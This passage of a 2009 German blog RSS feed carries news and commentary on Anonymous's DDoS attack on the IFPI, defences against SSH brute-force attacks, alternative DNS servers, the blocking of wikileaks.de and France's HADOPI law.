		<description><![CDATA[Nach dem Urteil gegen die Betreiber der Torrentsuchmaschine The Pirate Bay (Webseite) haben sogenannte Hacktivists Denial-of-Service Attacken (DDoS) gegen die Webseite des Weltverband der Phonoindustrie (IFPI) und im Verfahren beteiligte Anwälte gestartet. Als Resultat ist die Webseite der IFPI &#8211; ifpi.org &#8211; seit Montag teilweise nicht oder nur schlecht verfügbar.
Scheinbar gehen die aktuellen Attacken von [...]]]></description>
			<content:encoded><![CDATA[<p>Nach dem Urteil gegen die Betreiber der Torrentsuchmaschine <a href="http://de.wikipedia.org/wiki/The_Pirate_Bay">The Pirate Bay</a> (<a href="http://thepiratebay.org/">Webseite</a>) haben sogenannte Hacktivists <a href="http://de.wikipedia.org/wiki/Denial_of_Service">Denial-of-Service</a> Attacken (DDoS) gegen die Webseite des Weltverband der Phonoindustrie (<a href="http://de.wikipedia.org/wiki/IFPI">IFPI</a>) und im Verfahren beteiligte Anwälte gestartet. Als Resultat ist die Webseite der IFPI &#8211; ifpi.org &#8211; seit Montag teilweise nicht oder nur schlecht verfügbar.</p>
<p>Scheinbar gehen die aktuellen Attacken von der weltweit venetzten, aber dezentral organisierten, Gruppe <a href="http://de.wikipedia.org/wiki/Anonymous_%28Netzkultur%29">Anonymous</a> aus, einer Quasi-Vereinigung von Netzaktivisten. Diese Netzkultur (Wikipedia) ist bekannt aus Protesten gegen Scientology.</p>
<p>Auf irc.annonet.org diskutieren hunderte von Usern über Vergeltungsmaßnahmen gegen die IFPI und die sie vertretenen Anwälte und ihr Bestreben die Webseite ifpi.org mindestens am Montag durch DDoS aus dem Internet zu bekommen.</p>
<p>Coldblood, ein Admin von anonnet.org gegenüber <a href="http://www.theregister.co.uk">The Register</a>:</p>
<blockquote><p>&#8220;Sie wollen damit eine Nachricht übermitteln, dass die IFPI sich nicht mit dem Internet anlegen sollte und dass das Internet ein ernstes Geschäft ist. Dies ist ähnlich wie im Fall [der Proteste] gegen Scientology, welche vor mehr als einem Jahr begannen&#8221;</p></blockquote>
<p>Der aktuelle Angriff trägt den Namen &#8220;<a href="http://partyvan.info/wiki/Operation_Baylout">Operation Baylout</a>&#8220;. Ergebnisse, Pläne und Anleitungen für die Angriffe finden sich auf der dortigen Projektseite. Inwiefern die IFPI darauf reagiert und ob sie bereits geeignete Gegenmaßnahmen ergrriffen haben, wird sich zeigen.</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/04/08/ddos-angriffe-auf-mehrere-webhoster/" rel="bookmark" title="Permanent Link: DDoS Angriffe auf mehrere Webhoster und DNS Provider">DDoS Angriffe auf mehrere Webhoster und DNS Provider</a></li><li><a href="http://netzhappen.de/2009/03/04/ddos-angriffe-auf-bekannte-russische-gay-webseiten/" rel="bookmark" title="Permanent Link: DDos Angriffe auf bekannte russische Gay Webseiten">DDos Angriffe auf bekannte russische Gay Webseiten</a></li><li><a href="http://netzhappen.de/2009/02/12/ddos-angriff-auf-mehrere-sicherheits-webseiten/" rel="bookmark" title="Permanent Link: DDoS Angriff auf mehrere Sicherheits-Webseiten">DDoS Angriff auf mehrere Sicherheits-Webseiten</a></li><li><a href="http://netzhappen.de/2009/04/06/ddos-angriff-auf-registercom/" rel="bookmark" title="Permanent Link: DDoS Angriff auf Register.com">DDoS Angriff auf Register.com</a></li><li><a href="http://netzhappen.de/2009/01/29/ddos-lahmt-kirgistan-teil-2/" rel="bookmark" title="Permanent Link: DDoS lähmt Kirgistan &#8211; Teil 2">DDoS lähmt Kirgistan &#8211; Teil 2</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/oP10t-3u-3_UxNVha3hAz5DGToA/0/da"><img src="http://feedads.g.doubleclick.net/~a/oP10t-3u-3_UxNVha3hAz5DGToA/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/oP10t-3u-3_UxNVha3hAz5DGToA/1/da"><img src="http://feedads.g.doubleclick.net/~a/oP10t-3u-3_UxNVha3hAz5DGToA/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/8TLZBt5errE" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/04/20/ddos-angriff-gegen-weltverband-der-musikindustrie/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/04/20/ddos-angriff-gegen-weltverband-der-musikindustrie/</feedburner:origLink></item>
		<item>
		<title>SSH-Server Angriffe weiter sehr beliebt</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/lnJ82nzYjaQ/</link>
		<comments>http://netzhappen.de/2009/04/19/ssh-server-angriffe-weiter-sehr-beliebt/#comments</comments>
		<pubDate>Sun, 19 Apr 2009 11:08:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzsicherheit]]></category>
		<category><![CDATA[absichern]]></category>
		<category><![CDATA[angriff]]></category>
		<category><![CDATA[gegenmaßnahmen]]></category>
		<category><![CDATA[sicherheit]]></category>
		<category><![CDATA[ssh]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1524</guid>
		<description><![CDATA[DShield verfolgt seit langen Angriffsmuster und wertet täglich tausende Logdateien aus. Dabei haben sie wieder einnmal festgestellt das Bruteforce-Angriffe gegen SSH weiterhin sehr stark präsent sind. Dabei bedienen sich die Angreifer entweder Botnetzen und liegen damit schon im eher professionellen Bereich oder der Nachbar versucht sich auch einmal auf gut Glück am fremden Server. Berichte [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://isc.sans.org">DShield</a> verfolgt seit langen Angriffsmuster und wertet täglich tausende Logdateien aus. Dabei haben sie wieder einnmal festgestellt das Bruteforce-Angriffe gegen <a href="http://de.wikipedia.org/wiki/SSH">SSH</a> weiterhin sehr stark präsent sind. Dabei bedienen sich die Angreifer entweder Botnetzen und liegen damit schon im eher professionellen Bereich oder der Nachbar versucht sich auch einmal auf gut Glück am fremden Server. Berichte von Lesern von DShield zeigen auf das viele Angriffe auch zum Teil von Erfolg gekrönt sind.</p>
<p>Deswegen betonen sie in einem jüngst erschienen Hinweis die Wichtigkeit von sicheren Benutzernamen und Passwörtern. Vielleicht etwas zu extrem ausgedrückt, aber der Problematik angemessen sagen sie:</p>
<blockquote><p>&#8220;Wenn Sie einen über das Internet offen erreichbaren SSH-Server am laufen haben und die Benutzernamen und Passwörter nicht mindestens 8 Zeichen lang sind, ist der Server entweder bereits geknackt oder wird es bald sein. Dabei ist es völlig egal um was für Geräte es sich handelt &#8211; diejenigen die solche Scans durchführen haben längst bewiesen das sie fähig sind Cisco Router zu übernehmen oder iMac&#8217;s zu untergraben.&#8221;</p></blockquote>
<h3>Ergreife Gegenmaßnahmen</h3>
<p>Dabei gibt es viele recht einfache Gegenmaßnahmen:</p>
<ul>
<li>Filter (per IP) wer auf SSH zugreifen kann. Wer garnicht erst den SSH-Server erreichen kann, lann ihn auch nicht brutforcen.</li>
<li>Konfiguriere SSH so das nur Passwortgeschütze SSH Schlüssel benutzt werden können und klare bzw. leere Passwörter verboten sind.</li>
<li>Benutze schwer zu ratene Benutzernamen. Angreifer versuchen es meist mit den Standardnamen wie admin oder root.</li>
<li>Benutze einen anderen SSH Port als Port 22 um viele automatisierte Angriffe ins Leere laufen zu lassen.</li>
<li>Scanne das eigene Netzwerk um herauszufinden wo überall SSH läuft, bevor andere es tun.</li>
<li>Benutze &#8220;fail2ban&#8221;, obgeich das laut DShield nicht gegen die neuerdings so stark verbreiteten verteilten SSH Angriffe nützt.</li>
<li>Weise Nutzer, Freunde, Bekannte, Kollegen ect. darauf hin gute Passwörter zu nutzen.</li>
<li>Beobachte die Logdateien.</li>
</ul>
<p>All diese Dinge helfen gegen SSH-Angriffe und verringern im einfachste Fall die Anzahl der Attacken auf ein sehr niedriges Maß.</p>
<h3>Links</h3>
<p><a href="http://wiki.centos.org/HowTos/Network/SecuringSSH">SSH absichern</a></p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/04/08/ddos-angriffe-auf-mehrere-webhoster/" rel="bookmark" title="Permanent Link: DDoS Angriffe auf mehrere Webhoster und DNS Provider">DDoS Angriffe auf mehrere Webhoster und DNS Provider</a></li><li><a href="http://netzhappen.de/2009/03/24/bis-zu-450000-sql-injection-angriffe-pro-tag/" rel="bookmark" title="Permanent Link: Bis zu 450.000 SQL Injection Angriffe pro Tag">Bis zu 450.000 SQL Injection Angriffe pro Tag</a></li><li><a href="http://netzhappen.de/2009/01/29/ddos-lahmt-kirgistan-teil-2/" rel="bookmark" title="Permanent Link: DDoS lähmt Kirgistan &#8211; Teil 2">DDoS lähmt Kirgistan &#8211; Teil 2</a></li><li><a href="http://netzhappen.de/2009/04/06/ddos-angriff-auf-registercom/" rel="bookmark" title="Permanent Link: DDoS Angriff auf Register.com">DDoS Angriff auf Register.com</a></li><li><a href="http://netzhappen.de/2009/03/04/ddos-angriffe-auf-bekannte-russische-gay-webseiten/" rel="bookmark" title="Permanent Link: DDos Angriffe auf bekannte russische Gay Webseiten">DDos Angriffe auf bekannte russische Gay Webseiten</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/3AZ5Znh3Ygu884NVX2m0YVSyPGk/0/da"><img src="http://feedads.g.doubleclick.net/~a/3AZ5Znh3Ygu884NVX2m0YVSyPGk/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/3AZ5Znh3Ygu884NVX2m0YVSyPGk/1/da"><img src="http://feedads.g.doubleclick.net/~a/3AZ5Znh3Ygu884NVX2m0YVSyPGk/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/lnJ82nzYjaQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/04/19/ssh-server-angriffe-weiter-sehr-beliebt/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/04/19/ssh-server-angriffe-weiter-sehr-beliebt/</feedburner:origLink></item>
		<item>
		<title>Die einzig richtige Antwort</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/1K8dgMaKZus/</link>
		<comments>http://netzhappen.de/2009/04/19/die-einzig-richtige-antwort/#comments</comments>
		<pubDate>Sun, 19 Apr 2009 06:48:48 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[1984]]></category>
		<category><![CDATA[Netzpolitik]]></category>
		<category><![CDATA[alternative]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[filter]]></category>
		<category><![CDATA[frei]]></category>
		<category><![CDATA[zensur]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1515</guid>
		<description><![CDATA[Nun ist es ja soweit und die Internetausdrucker haben sich teilweise durchgesetzt. Fünf Provider haben den Vertrag über Kinderporno-Sperren unterzeichnet und werden in den nächsten Monaten die Sperren auf DNS-Basis umsetzten. Die Schwarzliste der Beteiligten liest sich wie folgt:

Deutsche Telekom
Vodafone/Arcor
Hansenet/Alice
Telefonica/O2
Kabel Deutschland

Darum nutzt freie, unabhängige DNS-Server. Klar, nicht um Zugang zu solchen Seiten zu haben (traurig [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://netzhappen.de/wp-content/uploads/2009/04/stopp.jpg"><img class="alignright size-thumbnail wp-image-1518" title="stopp" src="http://netzhappen.de/wp-content/uploads/2009/04/stopp-100x100.jpg" alt="stopp" width="100" height="100" /></a>Nun ist es ja soweit und die Internetausdrucker haben sich teilweise durchgesetzt. Fünf Provider haben den Vertrag über Kinderporno-Sperren unterzeichnet und werden in den nächsten Monaten die Sperren auf DNS-Basis umsetzten. Die Schwarzliste der Beteiligten liest sich wie folgt:</p>
<ul>
<li>Deutsche Telekom</li>
<li>Vodafone/Arcor</li>
<li>Hansenet/Alice</li>
<li>Telefonica/O2</li>
<li>Kabel Deutschland</li>
</ul>
<p>Darum nutzt freie, unabhängige DNS-Server. Klar, nicht um Zugang zu solchen Seiten zu haben (traurig das man dies immer dazuschreiben muss), sondern um den Internet-Nichtverstehern zu zeigen das ihre Maßnahmen nichts als heiße Wahlkampfluft und Propaganda ist. Und das all ihre <strong><a href="http://netzpolitik.org/2009/die-dreizehn-luegen-der-zensursula/">Lügen</a></strong> (danke @netzpolitik.org) irgendwann die breite Masse erreichen werden.</p>
<pre>$ cat /etc/resolv.conf
nameserver 213.73.91.35 # dnscache.berlin.ccc.de
nameserver 85.214.73.63 # FoeBud e.V.</pre>
<p>Weitere Informationen und alternative DNS-Server finden sich auf Wikileaks &#8211; <a href="http://wikileaks.org/wiki/Alternative_DNS/de">Alternative DNS</a>:</p>
<blockquote><p>Diese Seite listet Richtlinien und Hilfen zur Umgehung von länderspezifischen DNS-Sperren. Ein DNS-Server ist eine Art Telefonbuch, welches dem Computer hilft, eine bestimmte Adresse oder Website zu besuchen und/oder diese zu erreichen.</p>
<p>Die Liste gibt dir auch einen Überblick über Organisationen, die einen ungefilterten Zugang zum Internet ermöglichen und sich für die freiheitlichen Rechte der Bürger einsetzen, sowie Service-Providern, die sich entschieden haben, die Filterlisten nicht zu implementieren.</p></blockquote>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/02/06/neue-form-von-dns-amplification-erleichtert-ddos-angriffe/" rel="bookmark" title="Permanent Link: Neue Form von DNS Amplification erleichtert DDoS Angriffe">Neue Form von DNS Amplification erleichtert DDoS Angriffe</a></li><li><a href="http://netzhappen.de/2009/03/07/conficker-virus-baut-abwehrmasnahmen-aus/" rel="bookmark" title="Permanent Link: Conficker Virus baut Abwehrmaßnahmen aus">Conficker Virus baut Abwehrmaßnahmen aus</a></li><li><a href="http://netzhappen.de/2008/12/03/links-6/" rel="bookmark" title="Permanent Link: Links #6">Links #6</a></li><li><a href="http://netzhappen.de/2009/02/13/speicherdauer-von-usa-einreisedaten-bald-75-jahre/" rel="bookmark" title="Permanent Link: Speicherdauer von USA-Einreisedaten bald 75 Jahre">Speicherdauer von USA-Einreisedaten bald 75 Jahre</a></li><li><a href="http://netzhappen.de/2008/12/17/bund-vds-kritiker-sind-schuld/" rel="bookmark" title="Permanent Link: Bund: VDS-Kritiker sind Schuld">Bund: VDS-Kritiker sind Schuld</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/0OydlrIunyAfTodPbVDtiX3200c/0/da"><img src="http://feedads.g.doubleclick.net/~a/0OydlrIunyAfTodPbVDtiX3200c/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/0OydlrIunyAfTodPbVDtiX3200c/1/da"><img src="http://feedads.g.doubleclick.net/~a/0OydlrIunyAfTodPbVDtiX3200c/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/1K8dgMaKZus" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/04/19/die-einzig-richtige-antwort/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/04/19/die-einzig-richtige-antwort/</feedburner:origLink></item>
		<item>
		<title>Kurze Blogpause</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/IZ3Jj6cPFwU/</link>
		<comments>http://netzhappen.de/2009/04/16/kurze-blogpause/#comments</comments>
		<pubDate>Thu, 16 Apr 2009 10:04:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzhappen]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1509</guid>
		<description><![CDATA[Hallo,
aufgrund von Krankheit kann ich vorübergehend dieses Blog nicht weiterführen. Es sollte allerdings ungefähr in einer Woche wieder weitergehen.
Bis dahin aktuell passend:
(via Netzpolitik via Martin Haase)
Related posts:25C3 &#8211; Auf geht&#8217;sBKA-Gesetz: Vermittlungsausschuss hat sich geeinigt25C3 &#8211; Tag 2 #271% der deutschen Top100 Blogs nutzen WordpressDas weltweite schönste RechenzentrumCopyright &#169; 2009 Creative Commons (by-sa 3.0 de) This [...]]]></description>
			<content:encoded><![CDATA[<p>Hallo,</p>
<p>aufgrund von Krankheit kann ich vorübergehend dieses Blog nicht weiterführen. Es sollte allerdings ungefähr in einer Woche wieder weitergehen.</p>
<p>Bis dahin aktuell passend:<br />
<img class="aligncenter size-full wp-image-1513" title="zensursula" src="http://netzhappen.de/wp-content/uploads/2009/04/zensursula.jpeg" alt="zensursula" width="300" height="266" />(via <a href="http://netzpolitik.org/2009/zensursula-oder-kreativ-gegen-internetzensur/">Netzpolitik</a> via <a href="http://www.maha-online.de/blog/">Martin Haase</a>)</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2008/12/27/25c3-auf-gehts/" rel="bookmark" title="Permanent Link: 25C3 &#8211; Auf geht&#8217;s">25C3 &#8211; Auf geht&#8217;s</a></li><li><a href="http://netzhappen.de/2008/12/17/bka-gesetz-vermittlungsausschuss-hat-sich-geeinigt/" rel="bookmark" title="Permanent Link: BKA-Gesetz: Vermittlungsausschuss hat sich geeinigt">BKA-Gesetz: Vermittlungsausschuss hat sich geeinigt</a></li><li><a href="http://netzhappen.de/2008/12/29/25c3-tag-2-2/" rel="bookmark" title="Permanent Link: 25C3 &#8211; Tag 2 #2">25C3 &#8211; Tag 2 #2</a></li><li><a href="http://netzhappen.de/2009/04/20/71-der-deutschen-top100-blogs-nutzen-wordpress/" rel="bookmark" title="Permanent Link: 71% der deutschen Top100 Blogs nutzen Wordpress">71% der deutschen Top100 Blogs nutzen Wordpress</a></li><li><a href="http://netzhappen.de/2009/01/14/das-weltweite-schonste-rechenzentrum/" rel="bookmark" title="Permanent Link: Das weltweite schönste Rechenzentrum">Das weltweite schönste Rechenzentrum</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/9wKMq5EKWLaFM0Y4xAboFXHYS-w/0/da"><img src="http://feedads.g.doubleclick.net/~a/9wKMq5EKWLaFM0Y4xAboFXHYS-w/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/9wKMq5EKWLaFM0Y4xAboFXHYS-w/1/da"><img src="http://feedads.g.doubleclick.net/~a/9wKMq5EKWLaFM0Y4xAboFXHYS-w/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/IZ3Jj6cPFwU" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/04/16/kurze-blogpause/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/04/16/kurze-blogpause/</feedburner:origLink></item>
		<item>
		<title>Erste Gegenreaktionen auf Zensur von wikileaks.de (Update#4)</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/tJy0koDaYkQ/</link>
		<comments>http://netzhappen.de/2009/04/11/erste-gegenreaktionen-auf-zensur-von-wikileaksde/#comments</comments>
		<pubDate>Sat, 11 Apr 2009 18:14:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[1984]]></category>
		<category><![CDATA[Netzpolitik]]></category>
		<category><![CDATA[denic]]></category>
		<category><![CDATA[Sperrung]]></category>
		<category><![CDATA[wikileaks]]></category>
		<category><![CDATA[zensurliste]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1493</guid>
		<description><![CDATA[Wie bereits in aller Munde wurde gestern die deutsche Domain von Wikileaks gesperrt, das heißt momentan weist sie auf eine Seite der DENIC, der zentralen Registrierungsstelle für .de Domains. Die Gründe dieser Übernahme sind unklar, weder der eigentliche Besitzer der Domain noch Wikileaks selbst wurden vorab über diese Massnahme informiert. Brisant an der Geschichte ist, [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-1494" title="Wikileaks (www.wikileaks.org)" src="http://netzhappen.de/wp-content/uploads/2009/04/wikileaks_logo.png" alt="Wikileaks (www.wikileaks.org)" width="52" height="120" />Wie bereits in aller Munde wurde gestern die deutsche Domain von <a href="http://de.wikipedia.org/wiki/Wikileaks">Wikileaks</a> gesperrt, das heißt momentan weist sie auf eine Seite der <a href="http://de.wikipedia.org/wiki/Denic">DENIC</a>, der zentralen Registrierungsstelle für .de Domains. Die Gründe dieser Übernahme sind unklar, weder der eigentliche Besitzer der Domain noch Wikileaks selbst wurden vorab über diese Massnahme informiert. Brisant an der Geschichte ist, dass es bereits am 24. März beim Domaininhaber eine Hausdurchsuchung gab, aufgrund der Verlinkung von Wikileas auf diverse dort veröffentlichter Zensurlisten.</p>
<p>Diese Umleitung der deutschen Domain zeigt, was in Zukunft zu erwarten ist. Unliebsame Inhalte werden kurzerhand komplett übernommen und effektiv gesperrt. Wikileaks selbst sagte in einer Pressemitteilung das Deutschland nach China nun das zweite Land sei, welches eine Domain von Wikileaks sperrt. Allein das zeigt schon wohin die Reise zu gehen scheint.</p>
<p>Doch nach dem ersten Schock und den darauf folgenden empörten Reaktionen, kommt es nun zu aktiven Widerstandsaktionen. Wikileaks hatte kurzerhand aufgerufen deutsche Domains zu spenden und diese auf Wikileaks zu verweisen. Dieser Aufruf scheint inzwischen gehört zu werden und erste Früchte zu tragen. Folgende neue Domains verweisen inzwischen auf das Angebot von Wikileaks:</p>
<ul>
<li>http://unzensiert.cgisecurity.de</li>
<li>http://wikileaks.globalnode.eu</li>
<li>http://repressionsstaat.de</li>
<li>http://zensur-stop.de</li>
<li>&#8230;</li>
</ul>
<p><strong>Update 1:</strong><br />
Weitere Domains werden ab sofort <strong><a href="https://secure.wikileaks.org/wiki/Draft:Solidarity">hier</a></strong> auf Wikileaks gelistet.</p>
<p>Gespannt darf man also auf die Reaktion der Behörden beziehungsweise der Denic sein. Vor allem die Begründung der Umleitung von <a href="http://wikileaks.de">wikileaks.de</a> wird mit Spannung erwartet.</p>
<p><strong>Update 2:</strong><br />
Eine sogenannte TRANSIT-Info Seite, auf die wikileaks.de momentan zeigt, wird unter anderem auch angezeigt, falls der Provider den Vertrag kündigt. Womöglich hat in diesem Fall der Provider die Sache ins Rollen gebracht. Weiteres läßt sich aber wohl erst nach einer Stellungnahme der DENIC, des Providers oder der Behörde sagen, die dafür schlußendlich verantwortlich ist.</p>
<p><strong>Update 3:</strong><br />
Laut <a href="http://netzpolitik.org/2009/wikileaksde-gesperrt/">netzpolitik.org</a> wird der Provider der Domain am Dienstag eine Stellungnahme abgeben. Laut seiner Aussage hatte er nichts mit der Hausdurchsuchung neulich und auch nichts mit der aktuellen Umleitung zu tun.</p>
<p><strong>Update 4:</strong><br />
Laut <a href="http://twitter.com/wikileaks/status/1502370999">Wikileaks</a> wurde die Domain nach Angabe der DENIC vom Domain Registrar gelöscht.</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/06/17/netzsperren-und-andere-sauereien/" rel="bookmark" title="Permanent Link: Netzsperren und andere Sauereien">Netzsperren und andere Sauereien</a></li><li><a href="http://netzhappen.de/2009/01/23/ausnutzung-von-sicherheitslucken-immer-schneller/" rel="bookmark" title="Permanent Link: Ausnutzung von Sicherheitslücken immer schneller">Ausnutzung von Sicherheitslücken immer schneller</a></li><li><a href="http://netzhappen.de/2009/03/24/hausdurchsuchung-bei-wikileaksde/" rel="bookmark" title="Permanent Link: Hausdurchsuchung bei wikileaks.de *Update*">Hausdurchsuchung bei wikileaks.de *Update*</a></li><li><a href="http://netzhappen.de/2009/02/03/netzsperre-fur-frankreichs-internetbeauftragte/" rel="bookmark" title="Permanent Link: Netzsperre für Frankreichs Internetbeauftragte">Netzsperre für Frankreichs Internetbeauftragte</a></li><li><a href="http://netzhappen.de/2009/03/30/erster-massen-email-virus-melissa-wird-10-jahre-alt/" rel="bookmark" title="Permanent Link: Erster Massen-Email Virus Melissa wird 10 Jahre alt">Erster Massen-Email Virus Melissa wird 10 Jahre alt</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/SoDDdA08MDJJmTUyoBeVmKul7wQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/SoDDdA08MDJJmTUyoBeVmKul7wQ/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/SoDDdA08MDJJmTUyoBeVmKul7wQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/SoDDdA08MDJJmTUyoBeVmKul7wQ/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/tJy0koDaYkQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/04/11/erste-gegenreaktionen-auf-zensur-von-wikileaksde/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/04/11/erste-gegenreaktionen-auf-zensur-von-wikileaksde/</feedburner:origLink></item>
		<item>
		<title>Französisches Three-Strikes Gesetz vom Tisch?</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/gWaE44YXLYs/</link>
		<comments>http://netzhappen.de/2009/04/09/franzosisches-three-strikes-gesetz-vom-tisch/#comments</comments>
		<pubDate>Thu, 09 Apr 2009 12:27:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzpolitik]]></category>
		<category><![CDATA[3-strikes]]></category>
		<category><![CDATA[frankreich]]></category>
		<category><![CDATA[gesetz]]></category>
		<category><![CDATA[hadopi]]></category>
		<category><![CDATA[loi hadopi]]></category>
		<category><![CDATA[nationalversammlung]]></category>
		<category><![CDATA[three-strikes]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1488</guid>
		<description><![CDATA[Laut Futurzone bahnt sich eine große Überraschung zum sogenannten Three-Strikes (Loi HADOPI) Gesetz an. Bei der heutigen Abstimmung in der französischen Nationalversammlung erlitt die regierende UMP Partei von Ministerpräsident Sarkozy eine herbe Niederlage. So wurde der Gesetzesentwurf mit 21 zu 15 Stimmen abgelehnt, weil offenbar nicht genügend UMP Parlamentarier anwesend waren.
Loi HADOPI oder auch &#8220;Création [...]]]></description>
			<content:encoded><![CDATA[<p>Laut <a href="http://futurezone.orf.at/stories/1602192/">Futurzone</a> bahnt sich eine große Überraschung zum sogenannten Three-Strikes (Loi HADOPI) Gesetz an. Bei der heutigen Abstimmung in der französischen Nationalversammlung erlitt die regierende <a href="http://de.wikipedia.org/wiki/Union_pour_un_mouvement_populaire">UMP</a> Partei von Ministerpräsident Sarkozy eine herbe Niederlage. So wurde der Gesetzesentwurf mit 21 zu 15 Stimmen abgelehnt, weil offenbar nicht genügend UMP Parlamentarier anwesend waren.</p>
<p>Loi HADOPI oder auch &#8220;Création et Internet&#8221; war als Maßnahme gegen Filesharer gedacht um ihnen bei wiederholten Verstößen gegen Urheberrechte der Internetzugang gesperrt wird. Dabei wären auf Beschwerde der Musik- und Filmindustrie ect. von einer eigens neu angelegten Behörde zuerst Warnbriefe an die Betreffenen geschickt worden um ihnen dann im schlimmsten Fall für 1 Jahr das Internet zu sperren.</p>
<p>Zur heutigen Abstimmung kommt dazu, dass einige UMP&#8217;ler zuletzt doch mehr Unbehagen mit dem Gesetz hatte, weil einige Verschärfungen ihnen doch zu weit gingen. So hätten gesperrte Nutzer ihren Internetanschluß weiter bezahen müssen. Falls es nun nicht zu einer erneuten Abstimmung kommen sollte, shceint das Gesetz vorerst vom Tisch!</p>
